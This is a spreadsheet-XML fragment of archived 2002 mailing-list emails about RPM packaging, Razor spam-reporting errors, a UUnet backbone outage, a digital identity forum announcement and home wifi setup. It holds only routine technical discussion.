    <t>--- begin forwarded text To: rah@shipwright.com From: hacker@vudu.net Date: Thu, 03 Oct 2002 06:01:38 -0700 (PDT) Subject: Re: The 3rd Annual Consult Hyperion Digital Identity Forum The guy messed up his own URL. It should be [URL]http://www.digitalidforum.com[/URL] which redirects to [URL]http://www.consult.hyperion.co.uk[/URL] "R. A. Hettinga" wrote: &gt; &gt; Dear All, &gt; &gt; See [URL]www.digitalidentityforum.com[/URL] for more details. Speakers include &gt; Microsoft and Liberty Alliance, UK central and local government, &gt; law &gt; enforcement, financial services (Egg and RBS/NatWest), EC Research &gt; Centre, a &gt; psychologist and others. Look forward to seeing you there. &gt; &gt; Regards, &gt; Dave Birch. &gt; &gt; -- &gt; -- David Birch, Director, Consult Hyperion &gt; -- &gt; -- tel +44 (0)1483 301793, fax +44 (0)1483 561657 &gt; -- mail dave@chyp.com, web [URL]http://www.chyp.com[/URL] &gt; -- &gt; -- See you at the 2nd Annual Digital Transactions Forum in &gt; Singapore &gt; -- October 16th/17th 2002, see &gt; [URL]http://www.digitaltransactionsforum.com[/URL] &gt; &gt; --- end forwarded text &gt; &gt; &gt; -- &gt; ----------------- &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt; &gt; The Internet Bearer Underwriting Corporation &lt;[URL]http://www.ibuc.com[/URL]&gt;; &gt; 44 Farquhar Street, Boston, MA 02131 USA &gt; "... however it may deserve respect for its usefulness and &gt; antiquity, &gt; [predicting the end of the world] has not been found agreeable to &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman &gt; Empire' &gt; &gt; For help on using this list (especially unsubscribing), send a &gt; message to &gt; "dcsb-request@reservoir.com" with one line of text: "help".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http://www.digitalidforum.com http://www.consult.hyperion.co.uk www.digitalidentityforum.com http://www.chyp.com http://www.digitaltransactionsforum.com http://www.ibuc.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Jesse Keating &lt;hosting@j2solutions.net&gt;\nDate: Thu, 3 Oct 2002 16:33:43 -0700</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 16:33:43 -0700</t>
  </si>
  <si>
    <t>Jesse Keating &lt;hosting@j2solutions.net&gt;</t>
  </si>
  <si>
    <t>Re: K3B</t>
  </si>
  <si>
    <t>On Fri, 04 Oct 2002 03:25:30 +0200 Vincent  wrote: # If I get troubles with the .tar.gz source file compilation, will it # work with the .src.rpm source file compilation ? # If it will, how do I manage with a .src.rpm file, sorry, I don't # remeber :( The .src.rpm will prompt you for what packages you need to complete the compile. rpmbuild --rebuild --target=$arch file.src.rpm --  Jesse Keating j2Solutions.net Mondo DevTeam ([URL]www.mondorescue.org[/URL] Was I helpful?  Let others know:  [URL]http://svcs.affero.net[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>www.mondorescue.org http://svcs.affero.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Panu Matilainen &lt;pmatilai@welho.com&gt;\nDate: Thu, 3 Oct 2002 16:20:46 +0300 (EEST)</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 16:20:46 +0300 (EEST)</t>
  </si>
  <si>
    <t>Re: Python 2.2 site libs?</t>
  </si>
  <si>
    <t>On Fri, 4 Oct 2002, Mark Derricutt wrote: &gt; Anyone know where one could get rpms for alot of the python libraries for  &gt; 2.2? &gt;  &gt; Its darn annoying the way RH ship python 1.5.2 and python 2.2 (as python2)  &gt; and libs that only work with one or the other :( &gt;  &gt; esp. the pgdb and xml modules. &gt;  &gt; Anyone know why Red Hat insist on sticking with python 1.5.2? They want to preserve binary compatibility for all .x releases. Red Hat  8.0 has python 2.2 as default. --  	- Panu - _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Jesse Keating &lt;hosting@j2solutions.net&gt;\nDate: Thu, 3 Oct 2002 14:24:57 -0700</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 14:24:57 -0700</t>
  </si>
  <si>
    <t>On Fri, 04 Oct 2002 01:14:28 +0200 Vincent  wrote: # Hello, #  # I'm looking for the package k3b for the redhat 8.0, Does anyone know #  # where to get it ? I tried to compile but it did an error message: I've been working on a .src.rpm for it.  Their rpm and spec file is very dirty, so I"m cleaning it up.  I think I have all the build-req's and the install req's sorted out, but I need more testers. [URL]http://geek.j2solutions.net[/URL] Please try it. --  Jesse Keating j2Solutions.net Mondo DevTeam ([URL]www.mondorescue.org[/URL] Was I helpful?  Let others know:  [URL]http://svcs.affero.net[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://geek.j2solutions.net www.mondorescue.org http://svcs.affero.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Sven Willenberger" &lt;sven@dmv.com&gt;\nDate: Thu, 3 Oct 2002 13:18:25 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 13:18:25 -0400</t>
  </si>
  <si>
    <t>[Razor-users] problems with hubris and/or discovery</t>
  </si>
  <si>
    <t>trying to report spam [razor chooses hubris] I timeout on the connection\n(which seems to have gotten slower all morning) and receive the following\nerror message:\n\nrazor-report error: connect4: nextserver: discover1: Error reading socket\nconnect4: nextserver: discover1: Error reading socket\n\nI then try to run razor-admin -discover and receive the same error .....\nproblems with the servers today? only one discovery server?\n\nSven\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: R P Herrold &lt;herrold@owlriver.com&gt;\nDate: Thu, 3 Oct 2002 12:59:15 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 12:59:15 -0400 (EDT)</t>
  </si>
  <si>
    <t>R P Herrold &lt;herrold@owlriver.com&gt;</t>
  </si>
  <si>
    <t>Re: f-rpm] Python 2.2 site libs?</t>
  </si>
  <si>
    <t>On Fri, 4 Oct 2002, Mark Derricutt wrote: &gt; Anyone know why Red Hat insist on sticking with python 1.5.2? ehhh?  IANAHNBARHE -- RHL 8.0 is fully python-2, with a back compatability v 1 shim set.  This has been working and freely available in their Raw Hide for 5 months for early adopters and back-porters. Red Hat maintains binary compatability across major releases.   Its server management tools are heavily Python, and becoming  more so. To have added mid-stream the python-2 series in the RHL 7.x series would have been quite disruptive to an existing  installed base. -- Russ Herrold _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Whit Blauvelt &lt;whit@transpect.com&gt;\nDate: Thu, 3 Oct 2002 12:33:19 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 12:33:19 -0400</t>
  </si>
  <si>
    <t>Re: [Razor-users] "No razor servers available at this time"</t>
  </si>
  <si>
    <t>I'm still seeing razor reporting bomb out with a small variety of messages.\nWould reinitializing something here help, or does razor do that as needed\nanyway, and this just reflects trouble at the servers?\n\nAlso, since these are reports I'm making from within Mutt, it's annoying\nthat the error messages garble the X window a bit. If there's nothing\nconstructive to do about razor failing, can I at least turn off the failure\nmessages? One way or the other I'd rather not see them.\n\nWhit \n\nOn Wed, Sep 25, 2002 at 12:57:13PM -0400, Whit Blauvelt wrote:\n&gt; I'm getting "no servers available" about half the time in the last few days.\n&gt; This is with Razor 2. Is there something I need adjust in the installation\n&gt; here, or are the servers just down/overloaded?\n&gt; \n&gt; Thanks,\n&gt; Whit\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nDate: Thu, 3 Oct 2002 11:43:08 -0700</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 11:43:08 -0700</t>
  </si>
  <si>
    <t>[Razor-users] FW: [EVENT NOTIFICATION] UUnet North American</t>
  </si>
  <si>
    <t>--5vNYLRcllDrimb99 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable For everyone's benefit/edification, regardless of Razor usage. --jordan -----Original Message----- From: InterNAP Backbone Status Reports [mailto:noc@internap.com] Sent: Thursday, October 03, 2002 11:30 AM To: InterNAP Backbone Status Reports Subject: [EVENT NOTIFICATION] UUnet North American Backbone Problems 20021003@06:00 PDT [TIX106448] (fwd) Hello, I have just spoken with an UUnet technician at 11:23 PDT and he was unable to provide me with any new information regarding the outage.  He did confirm that problems had spread beyond the east coast and are now seen nationwide through out their network.  They are currently working with their hardware vendor to try and isolate the issue. A large number of Internap's connections to UUnet remain shutdown and traffic is being routed over alternate providers.  The scale of this outage is causing a large number of peering points with UUnet and other providers to be flooded due to the large traffic shifts. If you have problems reaching specific sites please send an email to noc@internap.com containing a traceroute and source/destination IP addresses and we will investigate.  If it is possible will will attempt to move specific prefixes onto an alternate provider leaving an Internap PNAP if that will provide better performance. Regards, Andrew -------------------------------------------------------------------- Andrew Dul                                 Network Operations Center InterNAP Network Services                   E-Mail: noc@internap.com andrew@internap.com                    206.256.9500 - 1.877.THE.INOC The contents of this email message are confidential and proprietary. ---------- Forwarded message ---------- Date: Thu, 3 Oct 2002 08:51:26 -0700 (PDT) From: Andrew Dul  Subject: [EVENT NOTIFICATION] UUnet North American Backbone Problems     [TIX106448] UUnet is currently experiencing a large number of problems in their North American backbone.  Internap has been aware of these problems since approx 06:00 PST.  Most of the problems appear to be concentrated on the East Coast but we have reports of problems from other geographic regions. This is being tracked under Internap ticket 106448 and UUnet master ticket 651751. UUnet currently does not have any ETA for a fix for this event. If you have issues reaching a specific site please send an email to noc@internap.com with a traceroute showing the path which has a problem. Internap has shutdown peerings to UUnet is various cities to help reduce the number of problems that customers will experience. Regards, Andrew -------------------------------------------------------------------- Andrew Dul                                 Network Operations Center InterNAP Network Services                   E-Mail: noc@internap.com andrew@internap.com                    206.256.9500 - 1.877.THE.INOC The contents of this email message are confidential and proprietary. --5vNYLRcllDrimb99 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.0 (GNU/Linux) iD8DBQE9nI+8pwQdAVEbU7oRAp25AJ9wlEUgdqUFi+7Hy/yYowIAid480gCfX49d M4Ox3gKrlqqmZ+hAy0wTFl0= =e6sV -----END PGP SIGNATURE----- --5vNYLRcllDrimb99-- ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Thu, 3 Oct 2002 11:05:10 +0200</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 11:05:10 +0200</t>
  </si>
  <si>
    <t>Re: Mplayer</t>
  </si>
  <si>
    <t>Once upon a time, Roi wrote : &gt; Since I upgraded to redhat8 mplayer -vo sdl isnt working for me &gt; It gives me black screen and I only hear sound. &gt;  &gt; can anyone help me with this ? I'll test this as soon as I can. &gt; btw, &gt; also the source rpm specified that I can do --without libdv &gt; but it didn't work, worked for lirc and arts. Should be fixed : You probably had libdv-devel installed and MPlayer automatically detected it. The new spec file explicitely passes --disable-libdv when the package is rebuilt with --without libdv. Grab the "fr2.1" spec from here : [URL]http://freshrpms.net[/URL] Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.02 0.10 0.15 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nDate: Thu, 3 Oct 2002 10:38:13 -0700</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 10:38:13 -0700</t>
  </si>
  <si>
    <t>Re: [Razor-users] problems with hubris and/or discovery</t>
  </si>
  <si>
    <t>--ey/N+yb7u/X9mFhi\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\nContent-Transfer-Encoding: quoted-printable\n\nFolks,\n\n     There have been several major internet outages this morning,\n     across major providers UUNet, Genuity, and god knows who else.\n     Various routes across the Internet backbones have been\n     disappearing, repropagating, and disappearing again.\n\n     This has caused and exacerbated several problems which we are\n     working on correcting right now.  We apologize for the\n     inconvenience..\n\nBest,=20\n\n--jordan\n\n\n\nOn Thu, Oct 03, 2002 at 01:18:25PM -0400, Sven Willenberger wrote:\n# trying to report spam [razor chooses hubris] I timeout on the connection\n# (which seems to have gotten slower all morning) and receive the following\n# error message:\n#=20\n# razor-report error: connect4: nextserver: discover1: Error reading socket\n# connect4: nextserver: discover1: Error reading socket\n#=20\n# I then try to run razor-admin -discover and receive the same error .....\n# problems with the servers today? only one discovery server?\n#=20\n# Sven\n#=20\n#=20\n#=20\n# -------------------------------------------------------\n# This sf.net email is sponsored by:ThinkGeek\n# Welcome to geek heaven.\n# [URL]http://thinkgeek.com[/URL]\n# _______________________________________________\n# Razor-users mailing list\n# Razor-users@lists.sourceforge.net\n# [URL]https://lists.sourceforge.net[/URL]\n\n--ey/N+yb7u/X9mFhi\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.0 (GNU/Linux)\n\niD8DBQE9nICFpwQdAVEbU7oRAiw+AJ966WR+zA0g47m0E7SkgCMbivfLkgCeOtGc\nV2cgz8USK1UPYH7YJwh1SyM=\n=dZej\n-----END PGP SIGNATURE-----\n\n--ey/N+yb7u/X9mFhi--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: dcsb@ai.mit.edu, cryptography@wasabisystems.com,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Thu, 3 Oct 2002 07:06:51 -0400</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 07:06:51 -0400</t>
  </si>
  <si>
    <t>The 3rd Annual Consult Hyperion Digital Identity Forum</t>
  </si>
  <si>
    <t>--- begin forwarded text User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Thu, 03 Oct 2002 07:56:39 +0100 Subject: The 3rd Annual Consult Hyperion Digital Identity Forum From: "David G.W. Birch"  To: Bob Hettinga  Cc: Digital Bearer Settlement List  Dear All, See [URL]www.digitalidentityforum.com[/URL] for more details. Speakers include Microsoft and Liberty Alliance, UK central and local government, law enforcement, financial services (Egg and RBS/NatWest), EC Research Centre, a psychologist and others. Look forward to seeing you there. Regards, Dave Birch. --  -- David Birch, Director, Consult Hyperion --  -- tel +44 (0)1483 301793, fax +44 (0)1483 561657 -- mail dave@chyp.com, web [URL]http://www.chyp.com[/URL] --  -- See you at the 2nd Annual Digital Transactions Forum in Singapore -- October 16th/17th 2002, see [URL]http://www.digitaltransactionsforum.com[/URL] --- end forwarded text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t>
  </si>
  <si>
    <t>www.digitalidentityforum.com http://www.chyp.com http://www.digitaltransactionsforum.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 3 Oct 2002 02:46:21 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 02:46:21 -0400 (EDT)</t>
  </si>
  <si>
    <t>wifi progress</t>
  </si>
  <si>
    <t>Well it looks pretty much 99% sure that we will be moving in on Nov 1 to\nthe new house. I think the only thing that stops us now are acts of\ndieties and total economic collapse..so no one mention the dow for the\nnext few weeks..\n\nIn preperation we drove to Best Buy tonight and picked up the test core\nfor the wifi net. I got a linksys BEFW11S4(1) for the router/hub/wireless\nap/firewall/etc and a linksys wifi pcmcia card for the laptop\n\nI made one false move so it took about 30 mins all told to set up the\ncard, the router, and the other 3 machines in the house on the wire ether\nhub. All vfery neat very easy and very very cool set up via the\nwebinterface. I have to dig into the firewall/nat/routing features some\nmore (i have been reading up the wifi security blackpaper on ars technica)\nbut all in all a smooth move.\n\n\nNow the place im at now, the house soon to be the ex house, has lots of\nfunky things going on in the walls and in the area. We are in ,\nessentialy, a gravel pit..recption of all types suck and transmisions get\ngoofy inside the pit.  That being said... with 2 walls and 40 feet between\nthe AP and the pcmica card (no external antena on it) Im still getting\n11mbs and at least 60% goodness.\n\n\nSome cool things about the new house...its a 1912 job so no metal works\ninthe walls to speak of , mostly wood and plaster. We dont have a\nmicrowave and our cordless phines are on 900mhz (yea so I can use my bear\ncat to listen in on some calls, with kids in the house is that such a bad\nthing? Ben or heather, if you read this years from now...well by then I\nhope youare better at countermoeasures:)- )\n\nOk, enough testing for tonight. I gota say, being able to do this in bed\nby vncing via wifi to my desktop is a blast...oh no...wifes pillow is\nheading this way....DUCKKKKK\n\n\n(1)[URL]http://www.linksys.com[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Thu, 3 Oct 2002 01:58:41 -0700</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 01:58:41 -0700</t>
  </si>
  <si>
    <t>If you examine the log further, you'll see debug messages generated by the\n(content) reporting process that follows error 230.\n\nOn Wed, Oct 02, 2002 at 10:20:49PM -0700, Jordan Ritter wrote:\n&gt; Error 230 occurs when you report a signature, but the server doesn't\n&gt; know about the signature, so it wants the full content.  It's\n&gt; basically an optimization.  \n&gt; \n&gt; Beyond that, I'm not sure how to interpret that output.. what version?\n&gt; Vipul?\n&gt; \n&gt; On Wed, Oct 02, 2002 at 11:59:01PM -0400, Rose, Bobby wrote:\n&gt; # What does this mean?  I set up procmailrc for a spamtrap but I'm getting\n&gt; # an error.  I also am reporting to pyzor and dcc and they aren't\n&gt; # registering an error.  What's weird is that it works sometimes.\n&gt; # \n&gt; # .\n&gt; # Oct 02 23:46:11.470523 report[14051]: [ 4] honor.cloudmark.com &gt;&gt; 20\n&gt; # Oct 02 23:46:11.470805 report[14051]: [ 6] response to sent.3\n&gt; # -res=1\n&gt; # err=230\n&gt; # .\n&gt; # Oct 02 23:46:11.471825 report[14051]: [ 5] mail 1, orig_email, special\n&gt; # case eng 1: Server accept\n&gt; # ed report.\n&gt; # Oct 02 23:46:11.472228 report[14051]: [ 8] mail 1.0, eng 4: err 230 -\n&gt; # server wants mail\n\n\n\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed yet."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: Doug Crompton &lt;doug@crompton.com&gt;\nDate: Thu, 3 Oct 2002 00:19:13 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 3 Oct 2002 00:19:13 -0400 (EDT)</t>
  </si>
  <si>
    <t>Doug Crompton &lt;doug@crompton.com&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Problem with SDK 2.03?</t>
  </si>
  <si>
    <t>I recently brought up a new system - SuSe 7.3 and I am running\nspamassassin and procmail, which work fine.\n\nI tried bringing up razor (2.14) but I am not able to get the SDK to\ninstall and razor reports missing modules. They appear to be there. I\nfollowed the installation directions. There appears to be an endless list\nof errors. Any ideas on what to do or where to start?\n\nDoug\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "cmeclax po'u le cmevi'u ke'umri" &lt;cmeclax@gmx.co.uk&gt;\nDate: Thu, 29 Aug 2002 19:33:44 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 19:33:44 -0400</t>
  </si>
  <si>
    <t>"cmeclax po'u le cmevi'u ke'umri" &lt;cmeclax@gmx.co.uk&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] Collision of hashes?</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nde'i Thursday 29 August 2002 13:36 la Fox cusku di'e\n&gt; The following was personal correspondence between two people.  I can't\n&gt;\n&gt; fathom how Razor thinks it is spam:\n\nWas it sent in HTML? If so, and it had a background, the background may have \nbeen sent in a spam.\n\ncmeclax\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9bq9f3/k1hdmG9jMRAk4XAJ9CheEA+/hLIU9zTzfJbPyoPUm+XwCfXgZ1\ntg7Fn8JcG9Q13UlKVfaOJzk=\n=Mw8+\n-----END PGP SIGNATURE-----\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Klaus Heinz &lt;k.heinz.aug.zwei@onlinehome.de&gt;\nDate: Thu, 29 Aug 2002 18:06:29 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 18:06:29 +0200</t>
  </si>
  <si>
    <t>Re: [SAtalk] SA very slow (hangs?) on this message, or is it just me?</t>
  </si>
  <si>
    <t>Urban Boquist wrote: &gt; it seems to hang. Memory usage goes up to 73MB and stays there. I have &gt; let it run for an hour before I killed it. This was on a &gt; Pentium-II-366. Yes, I know, a bit slow, but still... &gt;  &gt; Can anyone else confirm this hang? Maybe I should just upgrade... &gt;  &gt; My environment is: SA-2.31, perl-5.6 running on NetBSD-1.6F. Version 2.40-cvs (from today) on NetBSD/i386 1.5.2 (Athlon 1500):   Aug 29 17:55:53 silence spamd[2052]: processing message   &lt;20020829093613.6A00319300@groda.boquist.net&gt; for kh:1234, expecting   1744014 bytes.    Aug 29 17:57:10 silence spamd[2052]: clean message (2.5/5.0) for   kh:1234 in  77 seconds, 1744014 bytes.  Resident size about 75MB, according to top. ciao      Klaus ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: iiu@taint.org\nFrom: Martin Whelan &lt;mwhelan@deisedesign.com&gt;\nDate: Thu, 29 Aug 2002 18:04:41 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 18:04:41 +0100</t>
  </si>
  <si>
    <t>Martin Whelan &lt;mwhelan@deisedesign.com&gt;</t>
  </si>
  <si>
    <t>[IIU] Viruses and Bounced Mail</t>
  </si>
  <si>
    <t>All,\n\nIs it just me or has there been a massive increase in the amount of email \nbeing falsely bounced around the place? I've already received email from a \nnumber of people I don't know, asking why I am sending them email. These \ncan be explained by servers from Russia and elsewhere. Coupled with the \nfalse emails I received myself, it's really starting to annoy me. Am I the \nonly one seeing an increase in recent weeks?\n\nMartin\n\n\n\n========================================================================\nMartin Whelan | Dise Design | [URL]www.deisedesign.com[/URL] | Tel : 086-8888975\n\n" Our core product Diseditor  allows organisations to publish information \nto their web site in a fast and cost effective manner. There is no need for \na full time web developer, as the site can be easily updated by the \norganisations own staff.\nInstant updates to keep site information fresh. Sites which are updated \nregularly bring users back. Visit [URL]www.deisedesign.com[/URL] for a \ndemonstration "\n\nDiseditor  " Managing Your Information "\n========================================================================\n\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>www.deisedesign.com www.deisedesign.com http://iiu.taint.org</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Gordon Rutter" &lt;gordon@rutter.freeserve.co.uk&gt;\nDate: Thu, 29 Aug 2002 18:00:08 +0100</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 18:00:08 +0100</t>
  </si>
  <si>
    <t>"Gordon Rutter" &lt;gordon@rutter.freeserve.co.uk&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Fw: [nessie] New Nessie Pics</t>
  </si>
  <si>
    <t>Gordon Rutter gordon@rutter.freeserve.co.uk Join the Fortean Book Reviews list at  forteanbookreviews-subscribe@yahoogroups.com &gt; The latest potential pictures of Nessie - underwater - are at  &gt; [URL]www.hi-lands.com[/URL] ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt; 4 DVDs Free +s&amp;p Join Now [URL]http://us.click.yahoo.com[/URL] ---------------------------------------------------------------------~-&gt; To unsubscribe from this group, send an email to: forteana-unsubscribe@egroups.com   Your use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>www.hi-lands.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: secprog@securityfocus.com\nFrom: Yannick Gingras &lt;ygingras@eclipsys.qc.ca&gt;\nDate: Thu, 29 Aug 2002 17:46:27 -0400</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 17:46:27 -0400</t>
  </si>
  <si>
    <t>Yannick Gingras &lt;ygingras@eclipsys.qc.ca&gt;</t>
  </si>
  <si>
    <t>Secure Sofware Key</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nHi, \n   I am wondering if there are any techniques to make a CD-Key of the like \nunbreakable.  Either by giving it a cancelation date and a periodic renewal \nfrom a server or just by using self md5 signature on the resulting \nexecutable.  I know it must not be easy because the whole software piracy \nproblem would be resolved but there must be some way to make it really hard \nto break it.  Anyone have hints on this issue ?\n\nThanks\n\n- -- \nYannick Gingras\nNetwork Programer\nESC:wq\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.6 (GNU/Linux)\nComment: For info see [URL]http://www.gnupg.org[/URL]\n\niD8DBQE9bpYzuv7G0DNFO+QRAqBhAKChTeKXwD8zDMwf+okAKJXnnpknwACgtXZ7\nv3bBABue0VX/Uy86Fhn9Ifs=\n=Uwqj\n-----END PGP SIGNATURE-----</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Thu, 29 Aug 2002 17:11:21 +0200</t>
  </si>
  <si>
    <t>Thu, 29 Aug 2002 17:11:21 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Joshua wrote : &gt; Just a thought, would it be possible to generalize this ALSA  &gt; stuff to make building a kernel with *any* custom/optional/updated &gt; modules an easy thing? I think some scripts or at least step-by-step &gt; instructions would be great.  &gt;  &gt; For example, to build a kernel RPM with ALSA do: &gt; 1. get the kernel source &gt; 2. get the ALSA source &gt; 3. run the custom-kernel.sh script &gt; ... &gt;  &gt; Or a kernel RPM with the lastest wireless LAN drivers: &gt; 1. get the kernel source &gt; 2. get the CVS driver source &gt; 3. run the custom-kernel.sh script &gt; ... &gt;  &gt; etc. This wouldn't be worth the effort involved IMHO, and would probably end up in relative breakage of a few systems if not carefully tested. Your first example is a good one, because I really think it's even easier currently : 1. Leave your current kernel as-is 2. Get the "alsa-driver" source rpm 3. Rebuild and install resulting packages Drivers that are written to be easily compiled as modules (like ltmodem, NVidia, ALSA etc.) can easily be repackaged separately as rpms and ported as easily for various kernel rpms from the source rpm. Also, what you describe is sort of the opposite of what rpm packaging is in my mind. I see it more as a "one size fits all" achievement in the general case. And kernel isn't an exception (although there are packages optimized for various processors) since they all come with just about all the modules you'll ever need. Make that "one size fits many" then if you want ;-) Last but not least : The kernel is something I'm trying to keep away from in my packaging since I really don't want to see newbies screwing up their systems because of packages on my website... same goes for GNOME, KDE and other major bits of the distribution since I also want people who happily use my packages to be able to upgrade to the next Red Hat Linux release without having their system turned into another Ximian mess. Matthias PS: Yes Chris, I'm worried about not giving you too much work! Less in fact since you can easily answer "freshrpms.net!" to people asking how to play DVDs, right? ;-)))) --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;sitescooper-talk@example.sourceforge.net&gt;\nFrom: "Larry W. Virden" &lt;lvirden@cas.org&gt;\nDate: Thu, 29 Aug 2002 17:10:47 -0400 (EDT)</t>
